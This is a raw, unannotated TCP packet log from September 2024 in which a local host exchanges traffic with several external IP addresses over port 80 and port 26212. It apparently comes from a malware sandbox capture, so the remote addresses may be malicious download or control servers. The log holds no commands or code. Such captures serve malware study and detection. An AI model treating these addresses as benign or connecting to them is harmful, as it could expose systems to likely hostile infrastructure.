                                                                          Sep 27, 2024 04:21:16.943706989 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.944036961 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.944050074 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.944061995 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.944080114 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.944097042 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.944097042 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.944109917 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.944123983 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.944133997 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.944163084 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.944199085 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.944210052 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.944246054 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.944248915 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.944257021 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.944268942 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.944279909 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.944282055 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.944308996 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.944314003 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.944327116 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.944338083 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.944356918 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.944372892 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.944617987 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.944655895 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.948415995 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.948446035 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.948457003 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.948470116 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.948487043 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.948504925 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.948513985 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.948524952 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.948537111 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.948548079 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.948549032 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.948565006 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.948587894 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.948587894 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.948617935 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.948627949 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.948641062 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.948651075 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.948662043 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.948668957 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.948693037 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.948710918 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.948719025 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.948731899 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.948759079 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.948779106 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.949908018 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.949919939 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.949929953 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.949955940 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.949959993 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.949971914 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.949980974 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.949985027 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.950006962 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.950020075 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.950155020 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.950165987 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.950189114 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.950202942 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.951560974 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.951571941 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.951581955 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.951608896 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.951626062 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.951630116 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.951642036 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.951651096 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.951663017 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.951666117 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.951689005 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.951698065 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.973409891 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.975636005 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.975675106 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.975683928 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.975718975 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.975718021 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.975732088 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.975744009 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.975747108 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.975756884 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.975765944 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.975800037 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.975801945 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.975815058 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.975867033 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.975867033 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.975922108 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.975934982 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.975965977 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.975975037 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.975984097 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.975987911 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.976000071 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.976012945 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.976027966 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.976044893 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.976093054 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.976103067 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.976136923 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.976151943 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.977313995 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:16.982073069 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.985704899 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.985716105 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.985730886 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.985743046 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.985753059 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.985752106 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.985764980 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.985776901 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.985796928 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.985806942 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.985810041 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.985824108 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.985850096 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.985877037 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.987864017 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.987875938 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.987886906 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.987936020 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.987948895 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.987965107 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.987974882 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.987984896 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.988085985 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.988400936 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.988519907 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.988562107 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:16.988562107 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:16.988573074 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.988604069 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.988627911 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:16.988646984 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.988657951 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.988687992 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:16.988687992 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:16.989418030 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.989593983 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.989636898 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:16.989636898 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:16.989681005 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.989763975 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.989774942 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.989788055 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.989794016 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:16.989794016 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:16.989835978 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:16.989835978 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:16.989869118 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.989878893 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.989887953 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.989897966 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.989907980 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.989918947 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.989918947 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.989929914 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.989938021 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.989972115 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.990655899 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.990813971 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.990847111 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:16.990847111 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:16.992202997 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.992213011 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.992227077 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.992244959 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.992249966 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.992259026 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.992264032 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.992274046 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.992285967 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.992286921 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.992295980 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.992320061 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.992330074 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.992796898 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.992808104 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.992819071 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.992830038 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.992862940 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.992912054 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.992923021 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.992933989 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.992940903 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.992945910 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.992957115 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.992965937 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.992995024 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.993973970 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.993984938 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.993995905 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.994007111 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.994014978 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.994035006 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.994051933 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.994057894 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.994069099 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.994079113 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.994091034 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.994111061 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.994111061 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.994122982 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.994633913 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.994642973 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.994654894 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.994666100 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.994673967 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.994684935 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.994709015 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.994755983 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.994766951 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.994776964 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.994787931 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.994788885 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.994802952 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.994807959 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.994832993 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.994846106 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.994976044 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.994987011 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.994997025 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.995012999 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.995023966 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.995151997 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.995162964 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.995173931 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.995184898 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.995207071 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.995210886 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.995224953 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.995234966 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.995243073 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.995244980 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.995256901 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.995270014 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.995270967 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.995295048 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.995301962 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.995309114 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.995315075 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.995326996 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.995337009 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.995338917 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.995347977 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.995366096 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.995378971 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.995918989 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.995929956 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.995942116 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.995949984 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.995968103 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.995985031 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.995991945 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.996004105 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.996014118 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.996023893 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.996032000 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.996047974 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.996063948 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.996179104 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.996190071 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.996201992 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.996208906 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.996212959 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.996222973 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.996227026 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.996237993 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.996243954 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.996251106 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.996270895 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.997236013 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.005620956 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.005634069 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.005645990 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.005676031 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.005691051 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.005692005 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.005702972 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.005713940 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.005724907 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.005733967 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.005739927 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.005750895 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.005776882 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.021310091 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021321058 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021327019 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021375895 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.021404028 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021414995 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021425009 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021434069 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021442890 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.021445990 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021466017 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.021491051 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.021553040 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021586895 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.021621943 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021631956 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021641016 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021660089 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.021675110 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021677017 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.021692038 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021703005 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021712065 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.021743059 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.021765947 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021776915 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021786928 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021804094 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.021822929 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.021831989 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021862030 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.021893024 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.021904945 CEST8049725185.215.113.117192.168.2.5
